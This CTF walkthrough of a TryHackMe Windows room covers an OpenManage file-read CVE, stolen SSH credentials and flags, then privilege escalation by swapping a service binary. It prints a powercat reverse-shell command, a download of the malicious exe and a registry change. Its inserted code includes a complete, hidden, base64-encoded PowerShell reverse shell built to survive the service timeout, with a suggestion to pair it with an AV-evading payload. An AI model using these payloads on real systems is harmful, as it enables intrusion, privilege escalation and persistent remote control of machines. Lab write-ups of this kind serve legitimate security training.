Tryhackme Free Boot-to-Root Room: Hack Smarter Security
Considering the room description, before we run an nmap scan we will take a look at the website
On the H4XORS FOR HIRE tab, there is a Contact Us page (which may not lead to anything)
Doesn’t look like a robots.txt exists
Per Wappalyzer, looks like a standard Windows Server hosting IIS
Running a simple dirsearch didn’t find anything useful
Decided to use the -Pn flag for the nmap scan, which skips host discovery and treats the target as up even though it does not respond to ping
Port 1311 is Dell OpenManage, so we will see what searchsploit finds
Stepping back and browsing to the url: https://<THM IP>:1311 gives us a web page
Rhino Security Labs (where Tyler, the admin of the Hack Smarter Discord server, works) released an article covering a CVE in this application that allows an arbitrary file read
Able to read the win.ini file
Scrolling down, we see the following
Let’s go see what’s stored in the web.config file of the hacksmartersec site
Username: tyler
Password: IAmA1337h4x0randIkn0wit!
We can just SSH in now
What is user.txt?
Answer: THM{4ll15n0tw3llw1thd3ll}
Time for some privilege escalation
Hopping over to PowerShell to see if Defender is enabled, we get an error
We can use Get-Service on the WinDefend service to check instead
We are going to have to get our payload past Windows Defender if we are going to gain access as Administrator
Found a nice GitHub Repo for checking different items for Windows Privilege Escalation
Checking whoami /priv doesn’t turn up anything
Nothing saved in PowerShell History
Let’s check for Unquoted Service Path Vulnerability
Trying pretty much any of the sc query options results in an Access Denied
When Googling for Windows Privilege Escalation Checker tools, I came across the following
Hopping back into PowerShell, we can use wget (an alias for Invoke-WebRequest) to pull down our file
We will run a quick check
Most of the checks come back as Informational and non-vulnerable, but scrolling down we eventually find the following
The BUILTIN\Users group has Full Control over the folder that holds the spoofer-scheduler service binary, which means any user can delete the exe and drop their own executable under the same name; the next time the service starts, the Service Control Manager runs our file under the service’s account
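The check that surfaced this finding can be done by hand without the third-party checker. The script below is an added example, not code from the write-up or from the tool it used: it reads every service’s ImagePath from the registry (which normally stays readable even when sc query is denied), resolves the binary, and reports any whose file or containing folder grants write rights to BUILTIN\Users, Everyone, Authenticated Users or the current user. It also flags unquoted paths containing spaces, which is the other check from earlier. The identity list and the rights pattern are my assumptions about what counts as "low privileged".

```powershell
# Added example: hunt for service binaries a low-privileged user can replace.
# Run as the unprivileged user on the target. Uses the registry instead of
# "sc query" so it works when the SCM denies service enumeration.

# Assumption: these identities are "low privileged" on this box.
$weakIdentities = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
                    "$env:USERDOMAIN\$env:USERNAME")
# Assumption: any of these rights is enough to swap the binary.
$writeRights = 'FullControl|Modify|Write|ChangePermissions|TakeOwnership'

function Resolve-ServiceBinary {
    # Turn a raw ImagePath value into an absolute exe path plus quoting info.
    param([string]$ImagePath)
    if ([string]::IsNullOrWhiteSpace($ImagePath)) { return $null }
    $p = [Environment]::ExpandEnvironmentVariables($ImagePath.Trim())
    $p = $p -replace '^\\\?\?\\', ''                      # strip \??\ prefix
    $p = $p -replace '^\\SystemRoot', $env:SystemRoot    # \SystemRoot\... -> C:\Windows\...
    if ($p -match '^system32\\') { $p = Join-Path $env:SystemRoot $p }  # relative driver paths
    $quoted = $p.StartsWith('"')
    if ($quoted) { $exe = ($p -split '"')[1] }
    elseif ($p -match '^(.*?\.(exe|sys|dll|cmd|bat))(\s|$)') { $exe = $Matches[1] }
    else { $exe = ($p -split '\s+')[0] }
    [pscustomobject]@{
        Exe      = $exe
        # Unquoted + spaces is only exploitable if an intermediate folder is writable.
        Unquoted = (-not $quoted -and $exe.Contains(' '))
    }
}

function Test-WeakAcl {
    # Return "identity: rights" strings for allow ACEs that let weak identities write.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $weakIdentities -contains $_.IdentityReference.Value -and
        ($_.FileSystemRights.ToString() -match $writeRights -or
         (([int]$_.FileSystemRights) -band 0x50000000) -ne 0)   # GENERIC_ALL | GENERIC_WRITE
    } | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }
}

$findings = foreach ($svc in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue) {
    $props = Get-ItemProperty -LiteralPath $svc.PSPath -ErrorAction SilentlyContinue
    if (-not $props.ImagePath) { continue }
    $bin = Resolve-ServiceBinary $props.ImagePath
    if (-not $bin -or -not (Test-Path -LiteralPath $bin.Exe)) { continue }
    $weakFile = Test-WeakAcl $bin.Exe
    $weakDir  = Test-WeakAcl (Split-Path -Parent $bin.Exe)
    if ($weakFile -or $weakDir -or $bin.Unquoted) {
        [pscustomobject]@{
            Service     = $svc.PSChildName
            Binary      = $bin.Exe
            Unquoted    = $bin.Unquoted
            WeakFileAcl = ($weakFile -join '; ')
            WeakDirAcl  = ($weakDir  -join '; ')
        }
    }
}

$findings | Format-Table -AutoSize -Wrap
```

A hit in WeakDirAcl (rather than WeakFileAcl) is exactly the spoofer-scheduler situation: the exe itself may be locked down, but Full Control on the folder lets you delete it and put your own file in its place. Pair any hit with Get-Service to confirm you can stop and start the service as the low-privileged user; without that, the swap only pays off after a reboot.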
PowerCat allows for evading Defender
We are also going to use an online PowerShell to EXE converter
We are going to name the exe the same
Powercat is installed on Kali, so we need to create our reverse shell PowerShell script, and that is what we will upload to PS2EXE to convert
powercat -c <Kali tun0 IP> -p <port of your choice> -e cmd -g > shell.ps1
Now we will cat shell.ps1, copy all of the code and paste it into the website
We will start our python server, python3 -m http.server <port of choice>, in the same directory the converted spoofer-scheduler.exe is in
Before uploading our file, we need to do a few things on the THM VM
We are also going to want to know which registry value controls how long the Service Control Manager gives a service before it forcibly kills it. The value this write-up goes after is WaitToKillServiceTimeout, added with the following
reg add "HKLM\SYSTEM\CurrentControlSet\Control" /v WaitToKillServiceTimeout /t REG_SZ /d 1200000 /f
We can’t run this yet since we don’t have admin access; as soon as we get our reverse shell we will want to run it immediately. One caveat worth knowing: WaitToKillServiceTimeout only governs how long Windows waits for services to stop at shutdown. The 30-second start timeout that kills a binary which never registers with the SCM is ServicesPipeTimeout (a REG_DWORD in milliseconds under the same key), and both values are read at boot, so neither change takes effect without a reboot.
The things we need to do prior to uploading our exe are as follows
Step 1: Check that the spoofer-scheduler service is running
Get-Service -Name "spoofer-scheduler"
Step 2: Stop the spoofer-scheduler service
Stop-Service -Name "spoofer-scheduler"
Step 3: Verify the service has stopped successfully
Get-Service -Name "spoofer-scheduler"
Step 4: Delete the exe and verify it’s gone
Step 5: Start your netcat session on the port that was set
Now it is time to upload our malicious exe
Within PowerShell run the following wget command (use -OutFile rather than -o, which Invoke-WebRequest rejects as ambiguous)
wget http://<Kali tun0 IP>:<port that was set when starting python server>/spoofer-scheduler.exe -OutFile spoofer-scheduler.exe
Now we will start the spoofer service and watch our netcat session so that as soon as it connects we can copy/paste the reg add command from earlier
Start-Service -Name "spoofer-scheduler"
As you can see, it nearly instantly dies, hence why we needed the copy/paste ready
The above doesn’t seem to work sadly since we do not have the ability to reboot the machine
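The shell dies because the SCM terminates a service process that never reports back as a service, and a separate process it spawned is not terminated along with it. The script below is an added example, not the write-up’s powercat-generated shell.ps1: it is an alternative body to hand to PS2EXE in which the process the SCM starts only launches a hidden, detached powershell.exe carrying the reverse shell and then exits. Start-Service will still report that the service did not respond, but the child keeps running under the service’s account and there is no timeout to race against. The attacker IP and port are placeholders, and the plain TCP shell in the child is well known to Defender; the detaching is the point here, so in practice you would pair it with whatever payload gets past AV in your lab.

```powershell
# Added example: fake service binary that hands the reverse shell to a
# detached child process so the SCM's start timeout kills nothing useful.
# Placeholders (assumptions): replace with your Kali tun0 IP and listener port.
$AttackerIp   = '<Kali tun0 IP>'
$AttackerPort = 4444

# Script for the child: connect back, then loop input -> Invoke-Expression -> output.
# Backtick-escaped $ so the here-string only interpolates $AttackerIp/$AttackerPort.
$child = @"
`$c = New-Object System.Net.Sockets.TcpClient('$AttackerIp', $AttackerPort)
`$s = `$c.GetStream()
`$w = New-Object System.IO.StreamWriter(`$s)
`$w.AutoFlush = `$true
`$buf = New-Object byte[] 65536
`$w.Write('PS ' + (Get-Location).Path + '> ')
while ((`$n = `$s.Read(`$buf, 0, `$buf.Length)) -gt 0) {
    `$cmd = [System.Text.Encoding]::ASCII.GetString(`$buf, 0, `$n)
    `$out = `$(try { Invoke-Expression `$cmd 2>&1 | Out-String } catch { `$_ | Out-String })
    `$w.Write(`$out + 'PS ' + (Get-Location).Path + '> ')
}
`$c.Close()
"@

# Launch the child in a brand-new powershell.exe. -EncodedCommand avoids quoting
# problems and means this works whether the parent is a .ps1 or a PS2EXE binary.
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($child))
Start-Process -FilePath 'powershell.exe' -WindowStyle Hidden `
    -ArgumentList '-NoProfile', '-NonInteractive', '-EncodedCommand', $encoded

# Return immediately. The SCM logs a start failure for spoofer-scheduler, but the
# child process above survives and holds the connection to the listener.
```

With this in place the reg add from earlier is unnecessary: nothing needs to change on the host, and the listener gets a shell that stays up for as long as the child process runs. Check whoami in the new shell to confirm which account the service handed you.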
Since we can just keep restarting our shell, we can eventually grab the flag by pasting in the full path of the correct location
cd C:\Users\Administrator\Desktop\Hacking-Targets\
Which organizations is the Hack Smarter group targeting next?
I tried tab-completing the file, but it didn’t work
Answer: CyberLens, WorkSmarter, SteelMountain
A few nice walk-through shout outs
